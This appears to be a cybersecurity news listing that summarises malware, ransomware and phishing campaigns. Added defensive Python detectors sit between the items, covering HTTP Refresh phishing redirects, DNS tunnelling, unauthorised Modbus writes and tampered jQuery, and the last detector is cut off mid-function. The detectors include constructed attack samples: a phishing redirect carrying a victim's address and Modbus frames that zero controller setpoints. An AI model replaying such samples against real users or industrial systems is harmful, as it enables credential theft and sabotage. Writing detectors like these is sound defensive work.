News

North Korean Hackers Unleash New Malware in Targeted Attacks

Cybersecurity experts have detected two new malware strains, KLogEXE and FPSpy, linked to a North Korean hacking group. The group, identified as Kimsuky (also known by several aliases), has been active for over a decade and is notorious for its spear-phishing techniques, often tricking victims into downloading malicious software. According to a recent report, these …

New ‘SnipBot’ Malware Variant Linked to Data Theft Attacks

A newly discovered variant of the RomCom malware, named SnipBot, has been identified in a wave of cyberattacks aimed at stealing sensitive data from compromised systems. According to a report, SnipBot infiltrates networks, allowing attackers to extract valuable information and move laterally within organizations. Researchers uncovered SnipBot during a deep analysis of a specific DLL …

Storm-0501 Identified as a Key Player in Hybrid Cloud Ransomware Attacks

Storm-0501, a known cybercriminal group, has been actively targeting key sectors in the U.S., including government, manufacturing, transportation, and law enforcement, in a series of ransomware attacks. This campaign, identified by researchers, exploits hybrid cloud environments by moving from on-premises infrastructure into cloud platforms, leading to data theft, credential harvesting, system tampering, and ultimately, …

New Malware Targets Developers Through Infected Python Packages

A recent cyber campaign linked to North Korean threat actors is using compromised Python packages to distribute a new malware strain known as PondRAT. This malware appears to be a streamlined version of POOLRAT (also called SIMPLESEA), a previously identified macOS backdoor attributed to the Lazarus Group, which was involved in the 3CX supply chain …

New Octo2 Android Trojan Unleashes Powerful Device Takeover Features

Cybersecurity experts have uncovered a new version of the notorious Android banking trojan, Octo, now enhanced with advanced capabilities for device takeover and fraudulent transactions. The updated malware, dubbed Octo2 by its creator, has been found in ongoing campaigns across European countries such as Italy, Poland, Moldova, and Hungary, as revealed by a recent report. …

Cyberattacks Hit Transportation Firms with Malware

Transportation and logistics companies across North America are facing a new wave of phishing attacks delivering information-stealing malware and remote access trojans (RATs). According to recent reports, these campaigns exploit legitimate email accounts from compromised transport and shipping companies to inject malicious content directly into ongoing email threads. So far, at least 15 breached email …

Chinese Hackers Exploit GeoServer Flaw to Launch Attacks

A cyber espionage group suspected to be operating from China has launched targeted attacks on a Taiwanese government organization, and possibly on organizations in other countries in the Asia-Pacific (APAC) region, by exploiting a recently patched security vulnerability in OSGeo GeoServer GeoTools. The attack, identified by researchers in July 2024, has been attributed to an advanced persistent threat …

Necro Malware Hidden in Popular Play Store Camera and Browser Apps

The discovery of Necro malware in widely-used camera and browser apps on the Play Store has raised alarms, although it’s still unclear how the apps were initially compromised. Experts suspect that a malicious software development kit (SDK) used to integrate advertising features may be the source of the breach. First identified by a Russian cybersecurity …

Brazilian Hackers Launch SambaSpy Malware Through Phishing

A new malware named SambaSpy has been discovered exclusively targeting users in Italy through a sophisticated phishing campaign. The cyberattack, attributed to a Brazilian Portuguese-speaking threat group, raises concerns as it focuses solely on Italian victims, which is unusual since most attackers tend to aim for a wider audience to maximize their gains. According to …

Hackers Target Healthcare with New INC Ransomware Attacks

Microsoft has reported that a ransomware group known as Vanilla Tempest has begun targeting healthcare organizations using a new strain of ransomware called INC Ransom. This ransomware-as-a-service (RaaS) operation has been active since July 2023, attacking various public and private entities, including Yamaha Motor Philippines and the U.S. branch of Xerox Business Solutions, as well …

Massive ‘Raptor Train’ Botnet Hijacks Over 200,000 IoT Devices

Cybersecurity experts have uncovered a sophisticated botnet, dubbed “Raptor Train,” that has infected more than 200,000 small office/home office (SOHO) and Internet of Things (IoT) devices globally. This botnet is believed to be operated by a suspected Chinese state-sponsored group known as Flax Typhoon. It has been active since at least May 2020, with its …

New Malware Trap Locks Your Browser to Steal Google Passwords

A new malware campaign uses an unusual technique to trap users in their browser’s kiosk mode, coercing them into entering their Google credentials. Once entered, these credentials are stolen by a piece of information-stealing malware. This attack operates by locking the user’s browser on Google’s login page and preventing them from closing the window. The …

Windows Flaw Exploited by Hackers: CISA Urges Immediate Action

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent directive for federal agencies to secure their systems against a recently patched zero-day vulnerability in Windows, known as MSHTML (CVE-2024-43461). This flaw was exploited by the hacking group Void Banshee in a series of infostealer malware attacks. Initially disclosed during Microsoft’s Patch Tuesday, …

Ransomware Gangs Exploit Microsoft Azure Tools for Data Theft

Ransomware groups, such as BianLian and Rhysida, have adopted a new technique to steal sensitive data by abusing Microsoft Azure’s tools, particularly Azure Storage Explorer and AzCopy. These tools, designed to manage cloud storage and transfer data within Microsoft’s cloud ecosystem, are now being manipulated to extract large amounts of data from breached networks and …

Vo1d Malware Hits 1.3 Million Android TV Boxes in Global Cyberattack

A new malware strain known as Vo1d has infected nearly 1.3 million Android-based TV boxes worldwide, affecting users in 197 countries. The malware primarily targets devices running outdated versions of the Android operating system, spreading rapidly across Brazil, Morocco, Pakistan, Saudi Arabia, Argentina, Russia, Tunisia, Ecuador, Malaysia, Algeria, and Indonesia. According to a report by …

Malware Targets Android Users to Steal Financial Data

Since November 2023, a new Android malware called Ajina.Banker has been targeting bank customers across Central Asia, focusing on stealing financial information and intercepting two-factor authentication (2FA) messages. According to researchers, the malware is distributed via Telegram channels, disguised as legitimate apps related to banking, payment services, and even government utilities. The attackers rely on …

New Trojan Targets Android Users for Banking Fraud

Cybersecurity researchers have identified a new version of the Android banking trojan, TrickMo, which uses advanced techniques to avoid detection and steal users’ banking credentials. This malicious software tricks users into revealing sensitive information by displaying fake login screens and employing various anti-analysis mechanisms, including malformed ZIP files and a dropper app that avoids detection. …

Cybercriminals Exploit HTTP Headers to Steal Credentials in Phishing Attacks

Cybersecurity experts have raised alarms about a wave of phishing attacks leveraging HTTP headers to deploy fake email login pages designed to steal credentials. Unlike typical phishing methods that rely on HTML content, these attacks manipulate the HTTP response header before the HTML loads. This allows the phishing page to automatically reload without user interaction, …
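The redirect described above rides on a `Refresh` response header, which a browser honours before it renders any HTML. The following is an added example, not code from the report or from this page: a small Python checker that parses raw HTTP response headers and scores any `Refresh` redirect that fires with zero delay, leaves the serving host, or carries an email address in its target URL. The three sample responses, the hostnames in them and the `.invalid` phishing domain are constructed for the illustration.

```python
import re
from urllib.parse import unquote, urlparse

# Value of a Refresh header: "<seconds>" or "<seconds>;url=<target>" (case-insensitive).
REFRESH_RE = re.compile(r"^\s*(\d+)\s*(?:;\s*url\s*=\s*['\"]?([^'\"\s]+))?", re.IGNORECASE)
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def parse_headers(raw_response):
    """Return [(name, value), ...] from the head of a raw HTTP response."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return headers


def analyze_refresh(raw_response, served_host):
    """One finding per Refresh redirect. The score counts the traits seen in
    the campaign: zero delay, off-site target, victim address in the URL."""
    findings = []
    for name, value in parse_headers(raw_response):
        if name != "refresh":
            continue
        m = REFRESH_RE.match(value)
        if not m or m.group(2) is None:
            continue  # a bare "Refresh: 30" is a periodic reload, not a redirect
        delay, target = int(m.group(1)), m.group(2)
        target_host = (urlparse(target).hostname or served_host).lower()
        reasons = []
        if delay == 0:
            reasons.append("zero-delay refresh")
        if target_host != served_host.lower():
            reasons.append("redirects off-site to " + target_host)
        if EMAIL_RE.search(unquote(target)):
            reasons.append("target URL carries an email address")
        findings.append({"target": target, "score": len(reasons), "reasons": reasons})
    return findings


def is_suspicious(raw_response, served_host, threshold=2):
    """True when any Refresh redirect shows at least `threshold` traits."""
    return any(f["score"] >= threshold for f in analyze_refresh(raw_response, served_host))


# Constructed sample responses (headers only), not captured traffic.
PERIODIC = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nRefresh: 30\r\n\r\n<html>status</html>"
SAME_SITE = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nRefresh: 5; url=/login\r\n\r\n<html>bye</html>"
PHISH = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
    "Refresh: 0; url=https://login-verify.invalid/?user=alice%40corp.example#alice%40corp.example\r\n\r\n"
)

if __name__ == "__main__":
    for label, raw in (("periodic", PERIODIC), ("same-site", SAME_SITE), ("phish", PHISH)):
        print(label, is_suspicious(raw, "example.org"), analyze_refresh(raw, "example.org"))
```

Run against a proxy log or a `curl -i` capture, the same check flags the campaign's pages before the HTML body is ever fetched; the email-in-URL trait is the strongest signal, since legitimate redirects rarely pre-fill the visitor's address.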

PEAKLIGHT Downloader Targets Windows Users with Fake Movie Downloads

Cybersecurity experts have identified a new malware dropper called PEAKLIGHT that is being used in cyberattacks targeting Windows users through malicious movie downloads. This newly discovered dropper functions as a stealthy vehicle, enabling the launch of various harmful software, such as information stealers and other types of malware loaders. The dropper is designed to operate …

New Phishing Attack on Insurance Firms with Modified Quasar RAT

The Colombian insurance sector has come under attack by a threat actor known as Blind Eagle, who has been using a customized version of the Quasar Remote Access Trojan (RAT) since June 2024. This group, also referred to as AguilaCiega, APT-C-36, and APT-Q-98, has a history of targeting organizations and individuals in South America, with …

Hackers Unleash New Data Theft Malware in Attacks on Government Networks

A China-based cyber espionage group, known as Mustang Panda, has been identified using new malware tools, FDMTP and PTSOCKET, in recent attacks to infiltrate government networks and steal sensitive data. The group, also referred to as HoneyMyte, Bronze President, Earth Preta, Polaris, or Stately Taurus, has shifted to new strategies, focusing primarily on cyber-espionage against …

New Malware Uses Google Sheets to Steal Sensitive Data

A new malware campaign, featuring a previously unknown backdoor named “Voldemort,” is targeting organizations worldwide by posing as tax authorities from the U.S., Europe, and Asia. According to a recent report, this campaign began on August 5, 2024, and has already sent over 20,000 phishing emails to more than 70 different organizations, …

North Korean Hackers Exploit LinkedIn Job Offers to Spread Malware

North Korean cybercriminals have been using LinkedIn to target developers through fake job recruitment schemes, according to a recent report. These attackers leverage LinkedIn’s job posting platform to lure victims, often developers in the Web3 sector, into a false sense of security by pretending to offer coding challenges as part of a job application process. …

New Malware Impersonates VPN to Target Users

Cybersecurity experts have identified a new malware campaign targeting users by disguising itself as the Palo Alto Networks GlobalProtect VPN tool. The malware poses a significant threat by executing remote PowerShell commands, downloading and exfiltrating files, encrypting communications, and evading sandbox detection, according to a recent report. The malware employs a sophisticated two-stage process that …

New Android Trojan ‘Rocinante’ Masquerades as Banking Apps to Steal User Data

Android users are currently under attack by a new malware campaign featuring a banking trojan named Rocinante. This malware disguises itself as legitimate banking applications to steal sensitive information from unsuspecting victims. The malware, identified by cybersecurity researchers, uses Android’s Accessibility Service to perform keylogging and display phishing screens that mimic various banks to steal …

New Rust-Based Ransomware ‘Cicada3301’ Hits Windows and Linux Systems

Cybersecurity experts have discovered a new ransomware strain named Cicada3301, bearing similarities to the now inactive BlackCat (also known as ALPHV) operation. The ransomware primarily targets small and medium-sized businesses (SMBs) through opportunistic attacks that exploit system vulnerabilities, according to a report from a cybersecurity researcher. Cicada3301, written in the Rust programming language, is capable …

New Phishing Attack Uses QR Codes and Microsoft Sway to Steal Login Details

Cybersecurity experts are sounding the alarm on a new phishing campaign that uses QR codes—referred to as quishing—to steal user credentials by exploiting Microsoft Sway. The campaign takes advantage of the platform’s infrastructure to host fake login pages, once again showcasing how legitimate cloud services can be misused for malicious purposes. “Attackers use trustworthy cloud …

BlackSuit Ransomware Breach Exposes Data of Nearly 1 Million from Software Provider

A recent ransomware attack by BlackSuit has compromised the personal data of 954,177 individuals, prompting a mass notification effort by the affected software vendor, now known as Connexure. The Atlanta-based firm, which specializes in software solutions for the employer stop-loss insurance market, is informing nearly a million people about the breach, which occurred on April …

Ransomware Payments Soar to Nearly $460 Million in First Half of 2024

In the first half of 2024, ransomware payments have surged to an astonishing $459.8 million, setting the stage for a potential record-breaking year if the current pace continues. This marks a slight increase from the same period in 2023, where ransomware payments totaled $449.1 million, leading to a record $1.1 billion by year’s end. Despite …

NGate Malware Clones Contactless Payment Cards via NFC Data Theft

Cybersecurity experts have identified a new strain of Android malware, known as NGate, designed to siphon contactless payment data from victims’ physical credit and debit cards. The stolen data is relayed to a device controlled by attackers, enabling them to carry out fraudulent transactions. This new threat, dubbed NGate by researchers, has been observed targeting …

New macOS Malware ‘Cthulhu Stealer’ Targets User Data

Cybersecurity experts have identified a new piece of malware targeting Apple macOS systems, emphasizing the growing interest of cybercriminals in Apple’s operating system. Named ‘Cthulhu Stealer,’ this malware is designed to harvest a wide array of user data from macOS devices, showcasing how threat actors are increasingly focusing on Apple users. Launched in late 2023, …

New ‘Sedexp’ Linux Malware Conceals Credit Card Skimmers

Cybersecurity experts have discovered a new, stealthy Linux malware that uses an unusual technique to establish persistence on infected systems while concealing credit card skimmer code. The malware, named ‘sedexp’ by a cybersecurity incident response team, is attributed to a financially motivated group and has been active since 2022. The researchers highlighted that ‘sedexp’ is …

New Msupedge Backdoor Exploits PHP Vulnerability

A newly discovered backdoor named Msupedge has been deployed in a cyber attack against an unnamed university in Taiwan. The backdoor is notable for its use of DNS traffic to communicate with its command-and-control (C&C) server, according to the report. The attack likely began by exploiting a critical vulnerability in PHP (CVE-2024-4577, CVSS score: 9.8), …
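Command-and-control over DNS, as described above, leaves a characteristic trace in resolver logs: many distinct, long, high-entropy subdomains under one parent domain. The following is an added example, not code from the report or from this page: a Python profiler that reads query log lines, groups them by registrable domain (approximated here as the last two labels, which is an assumption that ignores public-suffix rules), and flags domains whose subdomains look like encoded data. The log lines, hosts and the `example.*` domains are constructed for the illustration.

```python
import math
from collections import defaultdict

HEX = "0123456789abcdef"


def _rotated_label(i):
    """Constructed 24-character label standing in for encoded beacon data."""
    r = HEX[i:] + HEX[:i]
    return r + r[:8]


# Constructed DNS query log lines: "<timestamp> <client> <qname> <qtype>".
SAMPLE_LOG = [
    "2024-08-20T10:00:00Z 10.0.0.5 www.example.com A",
    "2024-08-20T10:00:01Z 10.0.0.5 mail.example.com A",
    "2024-08-20T10:00:02Z 10.0.0.6 api.example.com A",
    "2024-08-20T10:00:03Z 10.0.0.5 www.example.com A",
    "2024-08-20T10:00:04Z 10.0.0.7 www.example.com A",
    "2024-08-20T10:00:05Z 10.0.0.6 mail.example.com A",
] + [
    f"2024-08-20T10:01:{i:02d}Z 10.0.0.9 {_rotated_label(i)}.example.net A"
    for i in range(6)
] + [
    f"2024-08-20T10:02:{i:02d}Z 10.0.0.5 img-{HEX[i]}{HEX[i + 1]}.example.org A"
    for i in range(6)
]


def shannon_entropy(s):
    """Bits per character of the label; random hex tends toward 4.0."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Return (registrable domain, subdomain labels joined without dots).
    Assumes the registrable domain is the last two labels."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return ".".join(labels), ""
    return ".".join(labels[-2:]), "".join(labels[:-2])


def profile_domains(lines):
    """Per-domain query count, unique-subdomain ratio, mean label length and entropy."""
    acc = defaultdict(lambda: {"queries": 0, "subs": set(), "len_sum": 0, "ent_sum": 0.0})
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue  # skip malformed lines rather than failing the run
        base, sub = split_name(parts[2])
        s = acc[base]
        s["queries"] += 1
        s["subs"].add(sub)
        s["len_sum"] += len(sub)
        s["ent_sum"] += shannon_entropy(sub)
    return {
        base: {
            "queries": s["queries"],
            "unique_ratio": len(s["subs"]) / s["queries"],
            "mean_len": s["len_sum"] / s["queries"],
            "mean_entropy": s["ent_sum"] / s["queries"],
        }
        for base, s in acc.items()
    }


def flag_tunneling(lines, min_queries=5, min_len=16.0, min_entropy=3.0, min_unique=0.8):
    """Domains whose subdomains are numerous, long, high-entropy and rarely repeated."""
    profile = profile_domains(lines)
    return sorted(
        base for base, p in profile.items()
        if p["queries"] >= min_queries and p["mean_len"] >= min_len
        and p["mean_entropy"] >= min_entropy and p["unique_ratio"] >= min_unique
    )


if __name__ == "__main__":
    for base, p in profile_domains(SAMPLE_LOG).items():
        print(base, p)
    print("flagged:", flag_tunneling(SAMPLE_LOG))
```

The thresholds are starting points, not tuned values: CDN and telemetry domains also produce hashed hostnames, so in practice the flagged list should be reviewed against an allowlist of known services before it drives an alert.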

Hackers Use Fake Brand Sites to Spread DanaBot and StealC Malware

Cybersecurity researchers have uncovered a sophisticated campaign where cybercriminals are mimicking legitimate brands to spread malware such as DanaBot and StealC. This operation, led by Russian-speaking hackers and known as Tusk, involves several sub-campaigns that exploit the credibility of well-known brands. By creating fake websites and social media profiles, these hackers trick users into downloading …

Banshee Stealer Malware Targets Over 100 Browser Extensions on macOS

Cybersecurity researchers have discovered a new stealer malware specifically designed for Apple macOS systems. Named Banshee Stealer, this malware is being sold on the cybercrime market for $3,000 per month and is compatible with both x86_64 and ARM64 architectures. “Banshee Stealer is highly versatile, targeting numerous browsers, cryptocurrency wallets, and about 100 browser extensions,” reported …

Attackers Linked to Black Basta Use SystemBC Malware

A new social engineering campaign connected to the Black Basta ransomware group has been identified, targeting users with credential theft attempts and deploying a malware dropper known as SystemBC. According to researchers, the attackers use a consistent tactic: sending an initial email bomb followed by phone calls pretending to offer a fake solution. These calls …

New Phishing Scheme Targets Mobile Banking Users

Mobile users in the Czech Republic are being targeted by a new phishing campaign that uses a Progressive Web Application (PWA) to steal banking credentials. The attacks have specifically targeted customers of Československá obchodní banka (CSOB) in the Czech Republic, OTP Bank in Hungary, and TBC Bank in Georgia, according to a cybersecurity firm. The phishing …

Major WordPress Plugin Flaw Puts 100,000+ Sites at Risk

A severe security vulnerability has been identified in the GiveWP donation and fundraising plugin for WordPress, which puts more than 100,000 websites at risk of remote code execution attacks. This flaw, officially tracked as CVE-2024-5932 with the maximum CVSS score of 10.0, affects all plugin versions prior to 3.14.2. The vulnerability was reported by a …

Cybercriminals Use Fake Websites to Spread DanaBot and StealC Malware

Cybersecurity experts have uncovered a sophisticated malware campaign in which attackers mimic well-known brands to distribute harmful software like DanaBot and StealC. This campaign, orchestrated by Russian-speaking cybercriminals under the codename “Tusk,” includes multiple sub-campaigns that exploit the trust users place in reputable platforms. These attackers lure victims into downloading malware through fake websites and …

Mandrake Spyware Resurfaces in Google Play Store Apps After 2 Years

A sophisticated Android spyware known as Mandrake has reappeared, hidden within five apps that were available on the Google Play Store for two years without detection. According to the report, these applications garnered over 32,000 installations before they were finally removed from the platform. The majority of these downloads occurred in countries such as Canada, …

New Go-Based Backdoor GoGra Targets South Asian Media Outlet

A previously unknown Go-based backdoor called GoGra was used in a cyberattack against a media organization in South Asia. According to a report, GoGra is written in the Go programming language and utilizes the Microsoft Graph API to communicate with a command-and-control (C&C) server hosted on Microsoft mail services. The exact method of delivery for …

FBI and CISA Alert on BlackSuit Ransomware Demanding Up to $500 Million

The FBI and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) have issued an updated warning about a dangerous ransomware strain known as BlackSuit, whose operators have reportedly made ransom demands totaling as much as $500 million. In one instance, a single ransom demand reached a staggering $60 million. According to the advisory, BlackSuit ransomware attackers are open …

New Phishing Scam Exploits Google Drawings and WhatsApp Links

Cybersecurity experts have uncovered a new phishing campaign that cleverly utilizes Google Drawings and shortened links generated through WhatsApp to evade detection and deceive users into clicking on fraudulent links designed to steal sensitive information. According to the report, the attackers have carefully chosen widely trusted platforms like Google and WhatsApp to host and deliver …

New Malware Targets 300,000 Users with Malicious Extensions

A widespread malware campaign has recently been detected, affecting over 300,000 users by installing rogue extensions in Google Chrome and Microsoft Edge browsers. This malware is being distributed through trojanized software, which users unwittingly download from fake websites that mimic popular software platforms. According to the report, the trojan carries a variety of harmful components. These …

New Android Trojan BingoMod Drains Funds and Erases Devices

Cybersecurity experts have identified a newly emerging Android remote access trojan (RAT) named BingoMod. This malicious software is capable of not only stealing money from infected devices but also wiping them clean to cover its tracks. The researcher noted that the malware is still being actively developed. Evidence suggests that the trojan may be the …

SideWinder Cyber Attacks Target Maritime Sites

The nation-state cyber threat actor known as SideWinder has been linked to a new espionage campaign aimed at maritime facilities and ports located in the Indian Ocean and Mediterranean Sea regions. The campaign, uncovered by researchers, relies on spear-phishing attacks targeting several countries, including Pakistan, Egypt, Sri Lanka, Bangladesh, Myanmar, Nepal, and …

Facebook Ads Lead Users to Fake Sites Stealing Credit Card Data

Facebook users have become targets of an extensive scam e-commerce network that employs hundreds of fraudulent websites to steal personal and financial information. These fake sites are designed to impersonate well-known brands and use deceptive advertising techniques to lure victims. The researchers uncovered the campaign on April 17, 2024, and dubbed it “ERIAKOS” due to …

Chameleon Trojan Masquerades as CRM App to Steal Banking Data

Cybersecurity researchers have uncovered a new technique used by the Chameleon Android banking trojan, which targets users in Canada by posing as a Customer Relationship Management (CRM) app. Researchers reported on Monday that Chameleon was seen disguising itself as a CRM app, specifically targeting a Canadian restaurant chain with international operations. This campaign, detected in …

Hackers Exploit ISP to Spread Malicious Updates

In mid-2023, the China-linked cyber espionage group Evasive Panda compromised an unnamed internet service provider (ISP) to distribute malicious software updates to target companies. This attack demonstrates the increasing sophistication of the group. Evasive Panda, also known as Bronze Highland, Daggerfly, and StormBamboo, has been active since at least 2012. The group is known for …

New Android Trojan BlankBot Steals Financial Data

Cybersecurity researchers have uncovered a new Android banking trojan called BlankBot, targeting Turkish users to steal their financial information. According to the analysis published last week, BlankBot possesses several malicious capabilities, including custom injections, keylogging, screen recording, and communication with a control server via a WebSocket connection. Discovered on July 24, 2024, BlankBot is currently …

AI Cybercrime Service Bundles Phishing Kits with Malicious Apps

A Spanish-speaking cybercrime group named GXC Team has been observed bundling phishing kits with malicious Android applications, enhancing their malware-as-a-service (MaaS) offerings. Researchers have been tracking this e-crime actor since January 2023. They describe the crimeware solution as a “sophisticated AI-powered phishing-as-a-service platform” that targets users of more than 36 Spanish banks, government bodies, and …

Stargazer Goblin Creates 3,000 Fake GitHub Accounts to Spread Malware

A threat actor known as Stargazer Goblin has established a network of fake GitHub accounts to run a Distribution-as-a-Service (DaaS) operation, spreading various information-stealing malware and earning $100,000 in illicit profits over the past year. This network, dubbed “Stargazers Ghost Network”, comprises over 3,000 accounts on GitHub. These accounts manage thousands of repositories used to …

New Phishing Scam Targets OneDrive Users with Malicious Script

Cybersecurity researchers are alerting the public about a new phishing campaign aimed at Microsoft OneDrive users, intending to execute a harmful PowerShell script. “This campaign relies heavily on social engineering tactics to trick users into running a PowerShell script, which compromises their systems,” said a security researcher. The cybersecurity firm is monitoring this clever phishing and …

Gh0st RAT Trojan Targets Users Through Fake Chrome Site

The remote access trojan known as Gh0st RAT has been detected being delivered by an “evasive dropper” called Gh0stGambit. This is part of a drive-by download scheme specifically targeting Chinese-speaking Windows users. These infections originate from a fake website, “chrome-web[.]com,” which serves malicious installer packages disguised as Google’s Chrome browser. This indicates that users searching …

New Malware ‘FrostyGoop’ Targets Energy Company

Cybersecurity researchers have discovered what they identify as the ninth Industrial Control Systems (ICS)-focused malware. This malware was used in a disruptive cyber attack targeting an energy company. The industrial cybersecurity firm that analyzed it has named the malware FrostyGoop and describes it as the first malware to directly use Modbus TCP communications to sabotage operational technology (OT) networks. …
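Because Modbus TCP carries no authentication, the only thing separating a sanctioned setpoint change from sabotage is who sent the write and what it wrote. The following is an added example, not code from the report or from this page: a Python decoder for Modbus/TCP request frames (MBAP header plus the common read and write PDUs) and an audit routine that raises an alert for every write-class function code (5, 6, 15, 16) originating from a host outside an engineering allowlist. The frames, addresses and the allowlist are constructed for the illustration; register 40 standing for a setpoint is an assumption.

```python
import struct

# Function codes that change controller state; 1-4 are reads.
WRITE_FUNCTIONS = {
    5: "Write Single Coil",
    6: "Write Single Register",
    15: "Write Multiple Coils",
    16: "Write Multiple Registers",
}


def build_frame(tid, unit, function, payload):
    """Modbus/TCP request: MBAP header (transaction id, protocol id 0,
    byte count of unit id + PDU) followed by the PDU (function + data)."""
    pdu = bytes([function]) + payload
    return struct.pack(">HHH", tid, 0, len(pdu) + 1) + bytes([unit]) + pdu


def parse_frame(frame):
    """Decode the MBAP header and the fields of the common read/write PDUs."""
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, proto, length = struct.unpack(">HHH", frame[:6])
    if proto != 0:
        raise ValueError("protocol id %d is not Modbus" % proto)
    if length != len(frame) - 6:
        raise ValueError("MBAP length %d does not match frame size" % length)
    unit, function, data = frame[6], frame[7], frame[8:]
    rec = {"tid": tid, "unit": unit, "function": function}
    if function in (1, 2, 3, 4) and len(data) >= 4:
        rec["address"], rec["quantity"] = struct.unpack(">HH", data[:4])
    elif function in (5, 6) and len(data) >= 4:
        rec["address"], rec["value"] = struct.unpack(">HH", data[:4])
    elif function == 16 and len(data) >= 5:
        addr, qty, byte_count = struct.unpack(">HHB", data[:5])
        rec["address"], rec["quantity"] = addr, qty
        if byte_count == 2 * qty and len(data) >= 5 + byte_count:
            rec["values"] = list(struct.unpack(">%dH" % qty, data[5:5 + byte_count]))
    return rec


def audit_writes(packets, allowed_writers):
    """packets: iterable of (src_ip, dst_ip, frame_bytes) for TCP/502 requests.
    One alert per write request from a host not in allowed_writers, plus one
    per frame that does not decode (a malformed frame on an OT network is
    itself worth a look)."""
    alerts = []
    for src, dst, frame in packets:
        try:
            rec = parse_frame(frame)
        except ValueError as err:
            alerts.append({"src": src, "dst": dst, "reason": "malformed: %s" % err})
            continue
        if rec["function"] in WRITE_FUNCTIONS and src not in allowed_writers:
            alerts.append({
                "src": src, "dst": dst, "function": rec["function"],
                "name": WRITE_FUNCTIONS[rec["function"]],
                "address": rec.get("address"),
                "value": rec.get("value", rec.get("values")),
                "reason": "write from host not on the engineering allowlist",
            })
    return alerts


# Constructed traffic (not a capture): a sanctioned workstation (10.10.1.5)
# and an unexpected host (10.10.1.77) both talking to a controller at
# 10.10.1.20, unit id 1. Register 40 is assumed to hold a setpoint.
ALLOWED_WRITERS = {"10.10.1.5"}
SAMPLE_PACKETS = [
    ("10.10.1.5", "10.10.1.20", build_frame(1, 1, 3, struct.pack(">HH", 0, 10))),    # read 10 holding registers
    ("10.10.1.5", "10.10.1.20", build_frame(2, 1, 6, struct.pack(">HH", 40, 650))),  # sanctioned setpoint write
    ("10.10.1.77", "10.10.1.20", build_frame(7, 1, 3, struct.pack(">HH", 0, 10))),   # reconnaissance read, no alert
    ("10.10.1.77", "10.10.1.20", build_frame(8, 1, 6, struct.pack(">HH", 40, 0))),   # setpoint forced to zero
    ("10.10.1.77", "10.10.1.20",
     build_frame(9, 1, 16, struct.pack(">HHB", 41, 2, 4) + struct.pack(">HH", 0, 0))),  # two registers zeroed
]

if __name__ == "__main__":
    for alert in audit_writes(SAMPLE_PACKETS, ALLOWED_WRITERS):
        print(alert)
```

A source allowlist is the cheapest control that this kind of attack runs into; the next step, not shown here, is a per-register policy (which addresses a given host may write, and within what range), which is what turns a write from a sanctioned host into a reviewable event as well.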

Over 100,000 Malware Android Apps Steal OTP Codes

A new malicious campaign has been identified, using Android apps to steal users’ SMS messages since at least February 2022. These apps are part of a large-scale effort to intercept one-time passwords (OTPs) used for online account verification, facilitating identity fraud. The campaign involves over 107,000 unique malicious app samples, designed to intercept OTPs. “Of …

Middle Eastern Military Personnel Targeted by GuardZoo Malware

Military personnel across the Middle East are being targeted by a surveillance operation deploying an Android data-gathering tool named GuardZoo. This campaign, initiated around October 2019, is believed to be orchestrated by a Houthi-aligned group. This conclusion is based on various factors, including the nature of the application lures, command-and-control (C2) server logs, targeting patterns, …

Malicious PyPI Package Steals Google Cloud Credentials

Cybersecurity researchers have uncovered a malicious package on the Python Package Index (PyPI) that targets macOS systems to steal Google Cloud credentials. The package, named “lr-utils-lib,” was uploaded in early June 2024 and downloaded 59 times before being removed. It targets a specific group of macOS machines using predefined hashes to steal Google Cloud authentication …

New Phishing Scam Targets CrowdStrike Users

CrowdStrike has issued a warning about a new phishing campaign aimed at German customers, exploiting the recent Falcon Sensor update mishap to distribute fake installers. On July 24, 2024, CrowdStrike detected a sophisticated spear-phishing attempt distributing a counterfeit CrowdStrike Crash Reporter installer through a website impersonating a German organization. This fake site was created on …

Security-Bypassing Tool Advertised by FIN7 on Dark Web

The financially motivated FIN7 group has been seen using various aliases across underground forums to promote a security-evasion tool used by ransomware groups such as AvosLocker, Black Basta, BlackCat, LockBit, and Trigona. The tool, named AvNeutralizer (also known as AuKill), was developed by FIN7 to disable security solutions. This tool has been marketed in the …

Scattered Spider Uses RansomHub and Qilin Ransomware in Attacks

The notorious cybercrime group known as Scattered Spider has incorporated the ransomware strains RansomHub and Qilin into its operations, according to Microsoft. Scattered Spider, recognized for its advanced social engineering tactics, targets organizations to gain access and persist for further exploitation and data theft. The group is also known for attacking VMware ESXi servers and deploying …

Trojanized jQuery Packages Detected on npm and GitHub

Unknown threat actors have been spreading compromised versions of jQuery on npm, GitHub, and jsDelivr, indicating a complex and persistent supply chain attack. The researchers' analysis highlights the attack's distinctiveness, owing to the variability among the packages. The attackers have hidden the malware within the rarely used ‘end’ function of jQuery, which is internally called by the …
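Hiding a payload in `end` works because that method is one short statement in upstream jQuery, and nobody reads it in a vendored copy. The following is an added example, not code from the report or from the jQuery project: a Python check that locates the `end: function(...) {...}` definition in a JavaScript file with a brace-matching scan, and compares its body, whitespace-insensitively, against the one statement jQuery's own `end()` contains (`return this.prevObject || this.constructor();`), so that any extra code in that function is reported. The three jQuery-like fragments and the `cdn.invalid` host are constructed for the illustration; the check is a heuristic and does not replace verifying the package against its published checksum.

```python
import re

# The complete body of jQuery's own end() (jQuery 3.x): one return statement.
# Anything beyond this in a vendored copy deserves a look.
EXPECTED_END_BODY = "return this.prevObject || this.constructor();"


def extract_function_body(source, name):
    """Return the text between the braces of `name: function (...) {...}`,
    or None if the property is absent or its braces do not balance.
    Braces inside string literals are not understood by this simple scan."""
    m = re.search(r"\b%s\s*:\s*function\s*\([^)]*\)\s*\{" % re.escape(name), source)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(source) and depth:
        ch = source[i]
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
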